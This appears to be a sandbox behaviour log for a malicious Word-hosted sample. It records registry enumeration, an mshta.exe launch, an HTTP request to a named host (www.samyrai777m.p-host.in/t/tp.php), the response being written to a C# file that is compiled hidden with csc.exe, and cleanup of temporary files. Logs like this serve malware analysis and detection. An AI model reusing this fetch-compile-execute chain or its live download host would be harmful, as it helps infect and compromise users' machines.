Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes True 1
Fn
Process Create process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
File Get Info filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\com, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows, type = file_attributes True 1
Fn
File Create Directory C:\Windows\system32\com\SOAPAssembly False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes True 1
Fn
Process Create process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL True 1
Fn
Thread 0xb60
(Host: 113, Network: 20)
+
Category Operation Information Success Count Logfile
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 True 1
Fn
System Get Info type = Operating System False 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 True 1
Fn
File Get Info filename = C:\Program Files\Microsoft Office\root\Office16\WINWORD.config, type = file_attributes False 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Module Map process_name = c:\program files\microsoft office\root\office16\winword.exe, desired_access = FILE_MAP_WRITE True 1
Fn
System Get Info type = Operating System False 2
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking False 1
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = www.samyrai777m.p-host.in, address_out = 185.211.244.133 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 185.211.244.133, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 92, size_out = 92 True 1
Fn
Data
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = www.samyrai777m.p-host.in, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /t/tp.php?thread=0 True 1
Fn
Inet Send HTTP Request headers = host: www.samyrai777m.p-host.in, connection: Keep-Alive, url = www.samyrai777m.p-host.in/t/tp.php?thread=0 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 1240 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 1240 True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\Desktop\Logo.cs, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\Logo.cs, type = file_type True 2
Fn
File Write filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 1098 True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\Desktop\Logo.cs, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\Logo.cs, type = file_type True 2
Fn
File Read filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 4096, size_out = 1098 True 1
Fn
Data
File Read filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 950, size_out = 0 True 1
Fn
File Read filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 4096, size_out = 0 True 1
Fn
System Get Info type = Operating System False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp, type = file_type True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, type = file_type True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, size = 1101 True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, type = file_type True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, size = 288 True 1
Fn
Data
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe, type = file_attributes True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, type = file_type True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err, type = file_type True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, size = 379 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process Create process_name = "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline", os_pid = 0xba0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.pdb False 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err True 1
Fn
File Delete filename = C:\Users\aETAdzjz\Desktop\__Sn.cs False 1
Fn
Process #2: csc.exe
(Host: 2, Network: 0)
+
Information Value
ID #2
File Name c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe
Command Line "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:02:36, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
+
Information Value
PID 0xba0
Parent PID 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010989 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BA4
0x 0
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable True False False
private_0x0000000000150000 0x00150000 0x00151fff Private Memory Readable, Writable True True False
locale.nls 0x00160000 0x001c6fff Memory Mapped File Readable False False False
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable True False False
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x00210fff Private Memory Readable, Writable True True False
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000230000 0x00230000 0x00236fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000240000 0x00240000 0x00241fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable True False False
private_0x0000000000260000 0x00260000 0x0035ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000360000 0x00360000 0x00360fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000370000 0x00370000 0x00370fff Pagefile Backed Memory Readable True False False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory Readable, Writable True True False
cscompui.dll 0x00390000 0x003b2fff Memory Mapped File Readable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False
csc.exe 0x00400000 0x00418fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000420000 0x00420000 0x00420fff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory Readable, Writable True True False
system.runtime.remoting.dll 0x00530000 0x00579fff Memory Mapped File Readable True False False
private_0x00000000005e0000 0x005e0000 0x005effff Private Memory Readable, Writable True True False
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01d10000 0x01fdefff Memory Mapped File Readable False False False
pagefile_0x0000000001fe0000 0x01fe0000 0x023d2fff Pagefile Backed Memory Readable True False False
private_0x00000000023e0000 0x023e0000 0x024dffff Private Memory Readable, Writable True True False
private_0x00000000025a0000 0x025a0000 0x025affff Private Memory Readable, Writable True True False
private_0x00000000025b0000 0x025b0000 0x026affff Private Memory Readable, Writable True True False
private_0x0000000002700000 0x02700000 0x0277ffff Private Memory Readable, Writable True True False
private_0x00000000027a0000 0x027a0000 0x0281ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000002860000 0x02860000 0x028dffff Private Memory Readable, Writable, Executable True True False
private_0x0000000002980000 0x02980000 0x029fffff Private Memory Readable, Writable True True False
private_0x0000000002a00000 0x02a00000 0x02dfffff Private Memory Readable, Writable True True False
private_0x0000000002e00000 0x02e00000 0x02efffff Private Memory Readable, Writable True True False
private_0x0000000002f10000 0x02f10000 0x02f8ffff Private Memory Readable, Writable True True False
private_0x0000000002f90000 0x02f90000 0x0318ffff Private Memory - True True False
system.dll 0x03190000 0x0349afff Memory Mapped File Readable True False False
system.data.dll 0x034a0000 0x03793fff Memory Mapped File Readable True False False
system.xml.dll 0x037a0000 0x03993fff Memory Mapped File Readable True False False
system.web.services.dll 0x039a0000 0x03a6cfff Memory Mapped File Readable True False False
mscorlib.dll 0x03a70000 0x03ecafff Memory Mapped File Readable False False False
private_0x0000000003ed0000 0x03ed0000 0x03fcffff Private Memory Readable, Writable True True False
private_0x000000006fff0000 0x6fff0000 0x6fffffff Private Memory Readable, Writable, Executable True True False
msvcr80.dll 0x75360000 0x75428fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x775e0000 0x776d9fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x776e0000 0x777fefff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x779d0000 0x779d6fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
diasymreader.dll 0x516f00000 0x516fc5fff Memory Mapped File Readable, Writable, Executable True False False
cscomp.dll 0x538000000 0x5381e8fff Memory Mapped File Readable, Writable, Executable True False False
alink.dll 0x59c800000 0x59c822fff Memory Mapped File Readable, Writable, Executable True False False
mscorwks.dll 0x7fee38d0000 0x7fee426cfff Memory Mapped File Readable, Writable, Executable True False False
mscoreei.dll 0x7fef13f0000 0x7fef1488fff Memory Mapped File Readable, Writable, Executable True False False
mscoree.dll 0x7fef1910000 0x7fef197efff Memory Mapped File Readable, Writable, Executable True False False
mscorpe.dll 0x7fef1af0000 0x7fef1b1bfff Memory Mapped File Readable, Writable, Executable True False False
c2r64.dll 0x7fef5860000 0x7fef5988fff Memory Mapped File Readable, Writable, Executable False False False
appvisvstream64.dll 0x7fef5990000 0x7fef5a09fff Memory Mapped File Readable, Writable, Executable False False False
appvisvsubsystems64.dll 0x7fef5a10000 0x7fef5c45fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-synch-l1-2-0.dll 0x7fef8f20000 0x7fef8f22fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc910000 0x7fefc91bfff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x7fefcaf0000 0x7fefcb0dfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefcd40000 0x7fefcd86fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefd040000 0x7fefd056fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefd640000 0x7fefd64efff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x7fefd750000 0x7fefd75efff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007fefd9c0000 0x7fefd9c0000 0x7fefd9cffff Private Memory Readable, Writable, Executable True True False
